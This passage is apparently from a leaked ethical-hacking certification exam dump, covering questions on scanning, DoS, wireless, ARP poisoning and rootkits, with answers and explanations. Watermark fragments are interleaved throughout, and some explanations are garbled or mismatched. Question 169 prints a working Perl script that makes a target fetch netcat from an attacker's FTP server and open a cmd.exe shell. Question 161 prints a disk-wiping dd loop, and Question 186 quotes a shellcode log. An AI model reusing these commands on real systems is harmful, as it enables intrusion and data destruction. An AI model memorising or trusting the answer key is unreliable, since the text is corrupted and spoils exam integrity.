B. nmap -sO -T 192.168.1.10
C. nmap R 192.168.1.10

D. nmap V 192.168.1.10
Answer: B
QUESTION NO: 147
What does the term 'Hacktivism' means?
A. Someone who is hacking for a cause

B. Someone who has at least 12 years of hacking experience
C. Someone who subscribe to hacker's magazine
D. Someone that has an urge to constantly hack
Answer: A
m
Explanation:
The term was coined by author/critic Jason Logan King Sack in an article about media artist Shu
.co
Lea Cheang. Acts of hacktivism are carried out in the belief that proper use of code will have
leveraged effects similar to regular activism or civil disobedience.
sts
QUESTION NO: 148

lTe
What port number is used by Kerberos protocol?
A. 419
tua
B. 44
C. 88
D. 487
Ac
Answer: C
Explanation:
Kerberos traffic uses UDP/TCP protocol source and destination port 88.
QUESTION NO: 149
Mark works as a contractor for the Department of Defense and is in charge of network security. He
has spent the last month securing access to his network from all possible entry points. He has
segmented his network into several subnets and has installed firewalls all over the network. He
has placed very stringent rules on all the firewalls, blocking everything in and out except ports that
must be used. He does need to have port 80 open since his company hosts a website that must
be accessed from the Internet. Mark is fairly confident of his perimeter defenses, but is still worried

about programs like Hping2 that can get into a network through covert channels.
How should mark protect his network from an attacker using Hping2 to scan his internal network?
A. Block ICMP type 13 messages

B. Block all outgoing traffic on port 53
C. Use stateful inspection on the firewalls
D. Block all incoming traffic on port 53
Answer: A
Explanation:
An ICMP type 13 message is an ICMP timestamp request and waits for an ICMP timestamp reply.
The remote node is right to do, still it would not be necessary as it is optional and thus many ip
stacks ignore such packets. Nevertheless, nmap again achived to make its packets unique by
setting the originating timestamp field in the packet to 0.
m
QUESTION NO: 150
.co
Bob was frustrated with his competitor, Brownies Inc., and decided to launch an attack that would
sts
result in serious financial losses. He planned the attack carefully and carried out the attack at the
appropriate moment. Meanwhile, Trent, an administrator at Brownies Inc., realized that their main
lTe
financial transaction server had been attacked. As a result of the attack, the server crashed and
Trent needed to reboot the system, as no one was able to access the resources of the company.
This process involves human interaction to fix it. What kind of Denial of Service attack was best
tua
illustrated in the scenario above?
A. DOS attacks which involves crashing a network or system

B. DOS attacks which involves flooding a network or system
Ac
C. Simple DDOS attack

D. DOS attacks which is done accidentally or deliberately
Answer: A
QUESTION NO: 151
Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured
on Web Servers.
A. False
B. True

Answer: B
Explanation:
Using HTTP basic authentication will result in your password being sent over the internet as clear
text. Don't use this technique unless you understand what the ramifications of this are.
QUESTION NO: 152
Bob is very security conscious; he is about to test a site that is known to have malicious applets,
code, and more. Bob always makes use of a basic Web Browser to perform such testing. Which of
the following web browsers can adequately fill this purpose?
A. Lynx
B. Mozilla
C. Internet Explorer
m
D. Tiger
Answer: A
.co
Explanation:
sts
Lynx is a program used to browse the World Wide Web, which works on simple text terminals,
rather than requiring a graphical computer display terminal.
lTe
QUESTION NO: 153

tua
Jackson discovers that the wireless AP transmits 128 bytes of plaintext, and the station responds
by encrypting the plaintext. It then transmits the resulting ciphertext using the same key and cipher
that are used by WEP to encrypt subsequent network traffic. What authentication mechanism is
Ac
being followed here?
A. no authentication
B. open system authentication
C. single key authentication
D. shared key authentication
Answer: D
Explanation:
Explantion: The following picture shows how the WEP authentication procedure:

QUESTION NO: 154
m
Smurf is a simple attack based on IP spoofing and broadcasts. A single packet (such as an ICMP
.co
Echo Request) is sent as a directed broadcast to a subnet on the Internet. All the machines on
that subnet respond to this broadcast. By spoofing the source IP address of the packet, all the
responses will get sent to the spoofed IP address. Thus, a hacker can often flood a victim with
sts
hundreds of responses for every request the hacker sends out.
Who are the primary victims of these attacks on the Internet today?
lTe
A. SPAM filters are the primary victim to smurf attacks

B. Mail servers are the primary victim to smurf attacks
tua
C. IDS devices are the primary victim to smurf attacks

D. IRC servers are the primary victim to smurf attacks
Ac
Answer: D
Explanation:
IRC servers are the primary victim to smurf attacks. Script-kiddies run programs that scan the
Internet looking for "amplifiers" (i.e. subnets that will respond). They compile lists of these
amplifiers and exchange them with their friends. Thus, when a victim is flooded with responses,
they will appear to come from all over the Internet. On IRCs, hackers will use bots (automated
programs) that connect to IRC servers and collect IP addresses. The bots then send the forged
packets to the amplifiers to inundate the victim.
QUESTION NO: 155
Bret is a web application administrator and has just read that there are a number of surprisingly
common web application vulnerabilities that can be exploited by unsophisticated attackers with
easily available tools on the Internet.
He has also read that when an organization deploys a web application, they invite the world to
send HTTP requests. Attacks buried in these requests sail past firewalls, filters, platform
hardening, SSL, and IDS without notice because they are inside legal HTTP requests. Bret is
determined to weed out any vulnerabilities. What are some common vulnerabilities in web
applications that he should be concerned about?
A. No IDS configured, anonymous user account set as default, missing latest security patch, no
firewall filters set and visible clear text passwords are just a few common vulnerabilities
B. No SSL configured, anonymous user account set as default, missing latest security patch, no
firewall filters set and an inattentive system administrator are just a few common vulnerabilities
C. Visible clear text passwords, anonymous user account set as default, missing latest security
patch, no firewall filters set and no SSL configured are just a few common vulnerabilities
D. Non-validated parameters, broken access control, broken account and session management,
m
cross-side scripting and buffer overflows are just a few common vulnerabilities
Answer: D .co
sts
QUESTION NO: 156
Which of the following best describes Vulnerability?

lTe
A. The loss potential of a threat

B. An action or event that might prejudice security
tua
C. A weakness or error that can lead to a compromise

D. An agent that could take advantage of a weakness
Answer: C
Ac
Explanation:
A vulnerability is a flaw or weakness in system security procedures, design or implementation that
could be exercised (accidentally triggered or intentionally exploited) and result in a harm to an IT
system or activity.
QUESTION NO: 157
Scanning for services is an easy job for Bob as there are so many tools available from the
Internet. In order for him to check the vulnerability of Brownies Inc., he went through a few
scanners that are currently available.
Here are the scanners that he used:

1. Axent's NetRecon (http://www.axent.com)

2. SARA, by Advanced Research Organization (http://www-arc.com/sara/)
3. VLAD the Scanner, by Razor (http://razor.bindview.com/tools/)
However, are there any other alternative ways to make sure that the services that have been
scanned will be more accurately reported and detailed for Bob? What would be the best method to
accurately identify the services running on a victim host?
A. Using a vulnerability scanner to try to probe each port to verify or figure out which service is
running for Brownies Inc.
B. Using Cheops-ng to identify the devices of Brownies Inc.
C. Using the default port and OS to make a best guess of what services are running on each port
for Brownies Inc
D. Using the manual method of telnet to each of the open ports of Brownies Inc.
m
Answer: D
Explanation:
.co
By running a telnet connection to the open ports you will receive banners that tells you what
sts
service is answering on that specific port.
lTe
QUESTION NO: 158
In an attempt to secure his 802.11b wireless network, Bob decides to use strategic antenna
tua
positioning. He places the antennas for the access points near the center of the building. For those
access points near the outer edge of the building he uses semi-directional antennas that face
towards the buildings center. There is a large parking lot and outlying field surrounding the building
that extends out half a mile around the building. Bob figures that with this and his placement of
Ac
antennas, his wireless network will be safe from attack. Which of the following statements is true?
A. Bob's network will be safe but only if he doesn't switch to 802.11a

B. With the 300-foot limit of a wireless signal, Bob's network is safe
C. Wireless signals can be detected from miles away; Bob's network is not safe
D. Bob's network will not be safe until he also enables WEP
Answer: C
Explanation:
It's all depending on the capacity of the antenna that a potential hacker will use in order to gain
access to the wireless net.

QUESTION NO: 159
ARP poisoning is achieved in _____ steps
A. 1
B. 3
C. 2
D. 4
Answer: C
Explanation:
The hacker begins by sending a malicious ARP "reply" (for which there was no previous request)
to your router, associating his computer's MAC address with your IP Address. Now your router
thinks the hacker's computer is your computer. Next, the hacker sends a malicious ARP reply to
m
your computer, associating his MAC Address with the routers IP Address. Now your machine
thinks the hacker's computer is your router . The hacker has now used ARP poisoning to
accomplish a MitM attack.
.co
sts
QUESTION NO: 160
While doing web application testing, you might be required to look through multiple web pages
lTe
online which can take a long time. Which process below would be a more efficient way of doing
this type of validation?
tua
A. Use get utility to download all pages locally for further inspection
B. Use wget utility to download all pages locally for further inspection
C. Use mget utility to download all pages locally for further inspection
Ac
D. Use get * utility to download all pages locally for further inspection
Answer: B
Explanation:
Wget is a utility used for mirroring websites, get* doesn't work, as for the actual FTP command to
work there needs to be a space between get and * (ie. get *), get(); is just bogus, that's a C
function that's written 100% wrong. mget is a command used from "within" ftp itself, ruling out A.
Which leaves B use wget, which is designed for mirroring and download files, especially web
pages, if used with the -R option (ie. wget -R www.testking.com ) it could mirror a site, all expect
protected portions of course.
Note: GNU Wget is a free network utility to retrieve files from the World Wide Web using HTTP
and FTP andcan be usedto make mirrors of archives and home pages thus enabling work in the
background, after having logged off.
QUESTION NO: 161
John Beetlesman, the hacker has successfully compromised the Linux system of Angent
Telecommunications, Inc's?Webserver running Apache. He has downloaded sensitive documents
and database files off the machine.
Upon performing various tasks, Beetlesman finally runs the following command on the Linux box
before disconnecting.
for (( i = 0;i<11;i++ )); do

?dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda
done
m
What exactly is John trying to do?
.co
A. He is making a bit stream copy of the entire hard disk for later download
B. He is deleting log files to remove his trace
C. He is infecting the hard disk with random virus strings
sts
D. He is wiping the contents of the hard disk with zeros
Answer: D
lTe
Explanation:
dd copies an input file to an output file with optional conversions. -if is input file, -of is output file.
tua
/dev/zero is a special file that provides as many null characters (ASCII NULL, 0x00; not ASCII
character "digit zero", "0", 0x30) as are read from it. /dev/hda is the hard drive.
Ac
QUESTION NO: 162
A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary
data storage area) than it was intended to hold. What is the most common cause of buffer
overflow in software today?
A. Bad permissions on files

B. Usage of non-standard programming languages
C. High bandwidth and large number of users
D. Bad quality assurance on software produced
Answer: D
Explanation:

Technically, a buffer overflow is a problem with the program's internal implementation.
QUESTION NO: 163
Spears Technology, Inc is a software development company located in Los Angeles, California.
They reported a breach in security, stating that its "security defenses has been breached and
exploited for 2 weeks by hackers." The hackers had accessed and downloaded 90,000 addresses
containing customer credit cards and passwords. Spears Technology found this attack to be so
severe that they reported the attack to the FBI for a full investigation. Spears Technology was
looking to law enforcement officials to protect their intellectual property.
How did this attack occur? The intruder entered through an employee's home machine, which was
connected to Spears Technology's corporate VPN network. The application called BEAST Trojan
was used in the attack to open a "back door" allowing the hackers undetected access. The
m
security breach was discovered when customers complained about the usage of their credit cards
without their knowledge.
.co
The hackers were traced back to Beijing, China through e-mail address evidence. The credit card
information was sent to that same e-mail address. The passwords allowed the hackers to access
sts
Spears Technology's network from a remote location, posing as employees. The intent of the
attack was to steal the source code for their VOIP system and "hold it hostage" from Spears
lTe
Technology, in exchange for ransom.
The hackers had intended on selling the stolen VOIP software source code to competitors.
tua
How would you prevent such attacks from occurring in the future at Spears Technology?
A. Disable VPN access to all your employees from home machines

Ac
B. Replace the VPN access with dial-up modem access to the company's network
C. Allow VPN access but replace the standard authentication with biometric authentication
D. Enable 25 character complex password policy for employees to access the VPN network
Answer: A
Explanation:
As long as there is a way in for employees through all security measures you can't be secure
because you never know what computer the employees use to access recourses at their
workplace.
QUESTION NO: 164

Buffer overflows are one of the top flaws for exploitation on the Internet today. A buffer overflow
occurs when a particular operation/function writes more data into a variable than the variable was
designed to hold. The two popular types of buffer overflows prevalent today are:
A. Dynamic buffer overflow

B. Active buffer overflow
C. Heap based buffer overflow
D. Stack based buffer overflow
Answer: C,D
QUESTION NO: 165
Bryce the bad boy is purposely sending fragmented ICMP packets to a remote target. The total
size of this ICMP packet once reconstructed is over 65,536 bytes. From the information given,
m
what type of attack is Bryce attempting to perform?
A. Smurf
.co
B. Ping of Death
C. Fraggle
sts
D. SYN Flood
Answer: B
lTe
Explanation:
Reference: http://insecure.org/sploits/ping-o-death.html
tua
QUESTION NO: 166

Ac
Matthew re-injects a captured wireless packet back onto the network. He does this hundreds of
times within a second. The packet is correctly encrypted and Matthew assumes it is an ARP
request packet. The wireless host responds with a stream of responses, all individually encrypted
with different IVs. What is this attack most appropriately called?
A. Injection attack
B. Replay attack
C. Rebound attack
D. Spoof attack
Answer: B
Explanation:

who intercepts the data and retransmits it, possibly as part of a masquerade attack by IP packet
substitution (such as stream cipher attack).
QUESTION NO: 167
John the hacker is sniffing the network to inject ARP packets. He injects broadcast frames onto
the wire to conduct MiTM attack. What is the destination MAC address of a broadcast frame?
A. 0xDDDDDDDDDDDD
B. 0xFFFFFFFFFFFF
C. 0xBBBBBBBBBBBB
D. 0xAAAAAAAAAAAA
m
Answer: B
Explanation:
.co
0xFFFFFFFFFFFF is the destination MAC address of the broadcast frame.
sts
QUESTION NO: 168

lTe
Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?
A. Stealth keylogger
tua
B. Hardware keylogger
C. Software keylogger
D. Covert keylogger
Ac
Answer: B
Explanation:
As the hardware keylogger never interacts with the Operating System it is undetectable by anti-
virus or anti-spyware products.
QUESTION NO: 169
What is the expected result of the following exploit?
#################################################################
$port = 53;# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ...\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
m
print "Press ENTER when download is finished ... (That's why it's good to have your own ftp
server)\n";
$o=<STDIN>; print "Opening ...\n";
.co
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
sts
print "Done.\n";
#system("telnet $host $port"); exit(0);
A. Opens up a telnet listener that requires no username or password

lTe
B. Creates an FTP server with write permissions enabled

C. Creates a share called "sasfile" on the target system
D. Opens an account with a username of Anonymous and a password of noone@nowhere.com
tua
Answer: A
Ac
Explanation:
The script being depicted is in perl (both msadc.pl and the script their using as a wrapper) -- $port,
$your, $user, $pass, $host are variables that hold the port # of a DNS server, an IP, username,
and FTP password. $host is set to argument variable 0 (which means the string typed directly after
the command). Essentially what happens is it connects to an FTP server and downloads nc.exe
(the TCP/IP swiss-army knife -- netcat)and uses nc to open a TCP port spawning cmd.exe
(cmd.exe is the Win32 DOS shell on NT/2000/2003/XP), cmd.exe when spawned requires NO
username or password and has the permissions of the username it is being executed as (probably
guest in this instance, although it could be administrator). The #'s in the script means the text
following is a comment, notice the last line in particular, if the # was removed the script would
spawn a connection to itself, the host system it was running on.

QUESTION NO: 170
What are the four existing Regional Internet Registry (RIR's)?
A. RIPE NCC, LACNIC, ARIN, APNIC

B. RIPE NCC, NANIC, ARIN, APNIC
C. RIPE NCC, ARIN, APNIC, LATNIC
D. APNIC, PICNIC, ARIN, LACNIC
Answer: A
Explanation:
All other answers includenon existing organizations (PICNIC, NANIC, LATNIC). See
http://www.arin.net/library/internet_info/ripe.html
m
QUESTION NO: 171
What type of port scan is shown below? .co

Scan directed at open port:
sts
ClientServer
192.5.2.92:4079 ---------FIN--------->192.5.2.110:23
lTe
192.5.2.92:4079 <----NO RESPONSE------192.5.2.110:23

tua
Scan directed at closed port:
ClientServer
Ac
192.5.2.92:4079 ---------FIN--------->192.5.2.110:23
192.5.2.92:4079<-----RST/ACK----------192.5.2.110:23
A. XMAS Scan
B. Idle Scan
C. Windows Scan
D. FIN Scan
Answer: D
QUESTION NO: 172

Clive has been hired to perform a Black-Box test by one of his clients. How much information will
Clive be able to get from the client before commencing his test?
A. Only the IP address range

B. All that is available from the client
C. Nothing but corporate name
D. IP Range, OS, and patches installed
Answer: C
Explanation:
Penetration tests can be conducted in one of two ways: black-box (with no prior knowledge the
infrastructure to be tested) or white-box (with complete knowledge of the infrastructure to be
tested). As you might expect, there are conflicting opinions about this choice and the value that
either approach will bring to a project.
m
Windump is a Windows port of the famous TCPDump packet sniffer available on a variety of
platforms. In order to use this tool on the Windows platform you must install a packet capture
sts
library. What is the name of this library?
A. NTPCAP
lTe
B. WinPCAP
C. PCAP
D. LibPCAP
tua
Answer: B
Explanation:
Ac
WinPcap is the industry-standard tool for link-layer network access in Windows environments: it
allows applications to capture and transmit network packets bypassing the protocol stack, and has
additional useful features, including kernel-level packet filtering, a network statistics engine and
support for remote packet capture.
QUESTION NO: 174
Jake works as a system administrator at Acme Corp. Jason, an accountant of the firm befriends
him at the canteen and tags along with him on the pretext of appraising him about potential tax
benefits. Jason waits for Jake to swipe his access card and follows him through the open door into
the secure systems area. How would you describe Jason's behavior within a security context?

A. Swipe Gating
B. Smooth Talking
C. Trailing
D. Tailgating
Answer: D
Explanation:
Tailgating , in which an unauthorized person follows someone with a pass into an office, is a very
simple social engineering attack. The intruder opens the door, which the authorized user walks
through, and then engages them in conversation about the weather or weekend sport while they
walk past the reception area together.
QUESTION NO: 175
m
What is Cygwin?
.co
A. Cygwin is a X Windows GUI subsytem that runs on top of Linux GNOME environment
B. Cygwin is a free C++ compiler that runs on Windows
C. Cygwin is a free Unix subsystem that runs on top of Windows
sts
D. Cygwin is a free Windows subsystem that runs on top of Linux
Answer: C
lTe
Explanation:
Cygwin is a Linux-like environment for Windows. It consists of two parts:
tua
A DLL (cygwin1.dll) which acts as a Linux API emulation layer providing substantial Linux API
functionality.
A collection of tools which provide Linux look and feel.
Ac
The Cygwin DLL works with all non-beta, non "release candidate", ix86 32 bit versions of Windows
since Windows 95, with the exception of Windows CE.
QUESTION NO: 176
Which type of scan does not open a full TCP connection?
A. Stealth Scan
B. XMAS Scan
C. Null Scan
D. FIN Scan
Answer: A

Explanation:
Stealth Scan: Instead of completing the full TCP three-way-handshake a full connection is not
made. A SYN packet is sent to the system and if a SYN/ACK packet is received it is assumed that
the port on the system is active. In that case a RST/ACK will be sent which will determined the
listening state the system is in. If a RST/ACK packet is received, it is assumed that the port on the
system is not active.
QUESTION NO: 177
Which of the following commands will you run in Linux to check for the presence of rootkits?
A. $ sudo runvirus
B. $ sudo avcheck
C. $ sudo chrootkit
m
D. $ sudo rootvirus
Answer: C .co
sts
QUESTION NO: 178
Travis works primarily from home as a medical transcriptionist.

lTe
He just bought a brand new Dual Core Pentium computer with over 3 GB of RAM.
He uses voice recognition software to help him transfer what he dictates to electronic documents.
tua
The voice recognition software is processor intensive, which is why he bought the new computer.
Travis frequently has to get on the Internet to do research on what he is working on.
After about two months of working on his new computer, he notices that it is not running nearly as
Ac
fast as it used to.

Travis uses antivirus software, anti-spyware software, and always keeps the computer up-to-date
with Microsoft patches.
After another month of working on the computer, Travis' computer is even more noticeably slow.
Every once in awhile, Travis also notices a window or two pop-up on his screen, but they quickly
disappear.He has seen these windows show up, even when he has not been on the Internet.
Travis is really worried about his computer because he spent a lot of money on it, and he depends
on it to work. Travis scans his computer with all kinds of software, and cannot find anything out of
the ordinary. Travis decides to go through Windows Explorer and check out the file system, folder
by folder, to see if there is anything he can find. He spends over four hours pouring over the files
and folders and cannot find anything.But, before he gives up, he notices that his computer only
has about 10 GB of free space available.Since his hard drive is a 200 GB hard drive, Travis thinks
this is very odd.

Travis downloads Space Monger and adds up the sizes for all the folders and files on his
computer. According to his calculations, he should have around 150 GB of free space. What is
mostly likely the cause of Travis' problems?
A. Travis's computer is infected with Self-Replication Worm that fills the hard disk space
B. Logic Bomb is triggered at random times creating hidden data consuming junk files
C. Travis's computer is infected with stealth kernel level rootkit
D. Travis's computer is infected with Stealth Trojan Virus
Answer: C
Explanation:
A rootkit can take full control of a system. A rootkit's only purpose is to hide files, network
connections, memory addresses, or registry entries from other programs used by system
administrators to detect intended or unintended special privilege accesses to the computer
m
resources.
.co
QUESTION NO: 179
sts
Joseph has just been hired on to a contractor company of the Department of Defense as their
Senior Security Analyst. Joseph has been instructed on the company's strict security policies that
lTe
have been implemented, and the policies that have yet to be put in place. Per the Department of
Defense, all DoD users and the users of their contractors must use two-factor authentication to
access their networks. Joseph has been delegated the task of researching and implementing the
tua
best two-factor authentication method for his company. Joseph's supervisor has told him that they
would like to use some type of hardware device in tandem with a security or identifying pin
number.
Ac
Joseph's company has already researched using smart cards and all the resources needed to
implement them, but found the smart cards to not be cost effective. What type of device should
Joseph use for two-factor authentication?
A. Proximity cards
B. Security token
C. Biometric device
D. OTP
Answer: B
Explanation:
A security token (sometimes called an authentication token) is a small hardware device that the
owner carries to authorize access to a network service. The device may be in the form of a smart

card or may be embedded in a commonly used object such as a key fob. Security tokens provide
an extra level of assurance through a method known as two-factor authentication : the user has a
personal identification number (PIN), which authorizes them as the owner of that particular device;
the device then displays a number which uniquely identifies the user to the service, allowing them
to log in.
QUESTION NO: 180
Paul has just finished setting up his wireless network.?He has enabled numerous security features
such as changing the default SSID, enabling WPA encryption, and enabling MAC filtering on his
wireless router. Paul notices that when he uses his wireless connection, the speed is sometimes
54 Mbps and sometimes it is only 24Mbps or less. Paul connects to his wireless router's
management utility and notices that a machine with an unfamiliar name is connected through his
wireless connection. Paul checks the router's logs and notices that the unfamiliar machine has the
m
same MAC address as his laptop.
What is Paul seeing here?

.co
A. MAC spoofing
sts
B. Macof
C. ARP spoofing
D. DNS spoofing
lTe
Answer: A
tua
Explanation:
You can fool MAC filtering by spoofing your MAC address and pretending to have some other
computers MAC address.
Ac
QUESTION NO: 181
You perform the following traceroute and notice that hops 19 and 20 both show the same IP
address. What does this most likely indicate?
1 172.16.1.254 (172.16.1.254) 0.724 ms 3.285 ms 0.613 ms

2 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 12.169 ms 14.958 ms 13.416 ms
3 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 13.948 ms ip68-100-0-1.nv.nv.cox.net
(68.100.0.1) 16.743 ms 16.207 ms
4 ip68-100-0-137.nv.nv.cox.net (68.100.0.137) 17.324 ms 13.933 ms 20.938 ms
5 68.1.1.4 (68.1.1.4) 12.439 ms 220.166 ms 204.170 ms
6 so-6-0-0.gar2.wdc1.Level3.net (67.29.170.1) 16.177 ms 25.943 ms 14.104 ms
7 unknown.Level3.net (209.247.9.173) 14.227 ms 17.553 ms 15.415 ms
8 so-0-1-0.bbr1.NewYork1.level3.net (64.159.1.41) 17.063 ms 20.960 ms 19.512 ms
9 so-7-0-0.gar1.NewYork1.Level3.net (64.159.1.182) 20.334 ms 19.440 ms 17.938 ms
10 so-4-0-0.edge1.NewYork1.Level3.net (209.244.17.74) 27.526 ms 18.317 ms 21.202 ms
11 uunet-level3-oc48.NewYork1.Level3.net (209.244.160.12) 21.411 ms 19.133 ms 18.830 ms
12 0.so-6-0-0.XL1.NYC4.ALTER.NET (152.63.21.78) 21.203 ms 22.670 ms 20.111 ms
13 0.so-2-0-0.TL1.NYC8.ALTER.NET (152.63.0.153) 30.929 ms 24.858 ms 23.108 ms
14 0.so-4-1-0.TL1.ATL5.ALTER.NET (152.63.10.129) 37.894 ms 33.244 ms 33.910 ms
15 0.so-7-0-0.XL1.MIA4.ALTER.NET (152.63.86.189) 51.165 ms 49.935 ms 49.466 ms
16 0.so-3-0-0.XR1.MIA4.ALTER.NET (152.63.101.41) 50.937 ms 49.005 ms 51.055 ms
17 117.ATM6-0.GW5.MIA1.ALTER.NET (152.63.82.73) 51.897 ms 50.280 ms 53.647 ms
18 example-gw1.customer.alter.net (65.195.239.14) 51.921 ms 51.571 ms 56.855 ms
19 www.example.com (65.195.239.22) 52.191 ms 52.571 ms 56.855 ms
20 www.example.com (65.195.239.22) 53.561 ms 54.121 ms 58.333 ms
A. A Honeypot
m
B. A host based IDS
C. A stateful inspection firewall
D. An application proxying firewall .co
Answer: C
sts
QUESTION NO: 182

lTe
Which of the following is an attack in which a secret value like a hash is captured and then reused
at a later time to gain access to a system without ever decrypting or decoding the hash.
tua
A. Brute Force Attacks

B. John the Ripper Attacks
C. Cryptography Attacks
Ac
D. Replay Attacks
Answer: D
Explanation:
who intercepts the data and retransmits it.
QUESTION NO: 183
In an attempt to secure his wireless network, Bob implements a VPN to cover the wireless
communications he is using in his office. Soon after the implementation, users begin complaining

about the wireless network slowing down. After benchmarking the network's speed, Bob discovers
that throughput has dropped by almost half, even though the number of users has remained the
same. What do you think is the reason behind this?
A. VPNs use larger packets than wireless networks normally do

B. Using a VPN with wireless doubles the overhead on an access point for all direct client to
access point communications
C. Using a VPN on wireless automatically enables WEP, which causes additional overhead
D. The stronger encryption used by the VPN slows down the network
Answer: B
Explanation:
By applying VPN the access point will have to recalculate all headers destined for client and from
clients twice.
m
Which of the following attacks takes best advantage of an existing authenticated connection
sts
A. Session Hijacking
B. Password Guessing
C. Password Sniffing
lTe
D. Spoofing
Answer: A
tua
Explanation:
Session hijacking is the act of taking control of a user session after successfully obtaining or
generating an authentication session ID. Session hijacking involves an attacker using captured,
Ac
brute forced or reverse-engineered session IDs to seize control of a legitimate user's Web
application session while that session is still in progress.
QUESTION NO: 185
Nathalie would like to perform a reliable scan against a remote target. She is not concerned about
being stealth at this point. Which of the following type of scans would be the most accurate and
reliable?
A. A TCP Connect scan

B. A FIN scan
C. A UDP scan

D. A half-scan
Answer: A
Explanation:
A TCP Connect scan, named after the Unix connect() system call is the most accurate scanning
method. If a port is open the operating system completes the TCP three-way handshake, and the
port scanner immediately closes the connection. Otherwise an error code is returned.
Example of a three-way handshake followed by a reset:
Source Destination Summary
-------------------------------------------------------------------------------------
[192.168.0.8] [192.168.0.10] TCP: D=80 S=49389 SYN SEQ=3362197786 LEN=0 WIN=5840
[192.168.0.10] [192.168.0.8] TCP: D=49389 S=80 SYN ACK=3362197787 SEQ=58695210
LEN=0 WIN=65535
[192.168.0.8] [192.168.0.10] TCP: D=80 S=49389 ACK=58695211 WIN<<2=5840
m
[192.168.0.8] [192.168.0.10] TCP: D=80 S=49389 RST ACK=58695211 WIN<<2=5840
QUESTION NO: 186

.co
sts
Given the following extract from the snort log on a honeypot, what service is being exploited?
12/09-01:22:31.167035 207.219.207.240:1882 -> 172.16.1.104:21

lTe
TCP TTL:50 TOS:0x0 ID:53476 DF

*****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78
TCP Options => NOP NOP TS: 126045057 105803098
tua
50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
Ac
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD .......1.1.1..F.
80 31 C0 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E .1.1.C..A.?...k^
31 C0 31 C9 8D 5E 01 88 46 04 66 B9 FF FF 01 B0 1.1..^..F.f.....

27 CD 80 31 C0 8D 5E 01 B0 3D CD 80 31 C0 31 DB '..1..^..=..1.1.
8D 5E 08 89 43 02 31 C9 FE C9 31 C0 8D 5E 08 B0 .^..C.1...1..^..
0C CD 80 FE C9 75 F3 31 C0 88 46 09 8D 5E 08 B0 .....u.1..F..^..
3D CD 80 FE 0E B0 30 FE C8 88 46 04 31 C0 88 46 =.....0...F.1..F
07 89 76 08 89 46 0C 89 F3 8D 4E 08 8D 56 0C B0 ..v..F....N..V..
0B CD 80 31 C0 31 DB B0 01 CD 80 E8 90 FF FF FF ...1.1..........
FF FF FF 30 62 69 6E 30 73 68 31 2E 2E 31 31 76 ...0bin0sh1..11v
65 6E 67 6C 69 6E 40 6B 6F 63 68 61 6D 2E 6B 61 englin@kocham.ka
73 69 65 2E 63 6F 6D 0D 0A sie.com..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882
*****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78
35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login incorr
m
65 63 74 2E 0D 0A ect...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
.co
12/09-01:22:39.878150 172.16.1.104:21 -> 207.219.207.240:1882
sts
*****PA* Seq: 0x110CE834 Ack: 0x33BC7447 Win: 0x7D78
32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74 221 You could at
lTe
20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62 least say goodb

79 65 2E 0D 0A ye...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
tua
12/09-01:22:39.880154 172.16.1.104:21 -> 207.219.207.240:1882

***F**A* Seq: 0x110CE859 Ack: 0x33BC7447 Win: 0x7D78
Ac
A. SSH
B. SMTP
C. FTP
D. Telnet
Answer: C
Explanation:
The connection is done to 172.16.1.104:21.
QUESTION NO: 187

You have initiated an active operating system fingerprinting attempt with nmap against a target
system:root@ceh NG]# /usr/local/bin/nmap -sT -O 10.0.0.1
Starting nmap 3.28 ( www.insecure.org/nmap/) at 2003-06-18 19:14 IDT

nteresting ports on 10.0.0.1:
The 1628 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp filtered ftp
2/tcp filtered ssh
5/tcp open smtp
